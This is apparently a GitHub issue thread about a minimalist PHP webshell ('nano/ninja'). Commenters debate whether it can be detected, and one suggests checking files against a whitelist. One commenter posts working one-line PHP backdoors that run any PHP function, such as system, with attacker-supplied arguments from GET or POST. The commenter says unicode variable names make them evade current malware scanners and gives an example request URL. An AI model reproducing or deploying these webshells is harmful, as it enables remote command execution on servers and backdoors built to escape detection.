nano / ninja easily detectable #7
Comments
First of all i really like your idea. And my issue come up when i try to test your code (the second code). it didn't show any result rather than random number as show below: cat test.php: i am new with web shell so i have no idea how to run your code. |
|
I also suggest to change the wording on the readme. "Fully undetectable" is a bold (and wrong) statement. Don't get me wrong, nice idea, but "undetectable" things dont't exist. One can simply check using a whitelist of php files using nothing but find and diff commands. Also I have yet to see a base64decode command in the wild, except in poorly 'obfuscated' webshells (which are deobfiscated in seconds). So that could be marked by a scanner as "potential risk". Basically, just change the wording :) |
hey bro, your backdoor is easily detectable. checkout php malware scanner. Also this will dump out a lot of php warnings on any current version of PHP.
Here is an alternate version that supports GET and POST and will bypass any current scanner by using unicode variable names, underscores and arrays.
The password comes by changing the variable names zc and xz
the code will execute the php command passed in the zc variable with the argument xz and will accept them from $_GET or $_POST
example: www.example.com/nano2.php?zc=system&zx=ls+-l
<?php $_qΔ[0]=array_merge(['zc'=>'','xz'=>'pi'],$_REQUEST);echo $_qΔ[0]['xz']($_qΔ[0]['zc']);this could be shortened, but i think the previous version would make a more complex regex to detect:
<?php $Δ=array_merge(['z'=>0,'x'=>'pi'],$_REQUEST);echo $Δ['x']($Δ['z']);The text was updated successfully, but these errors were encountered: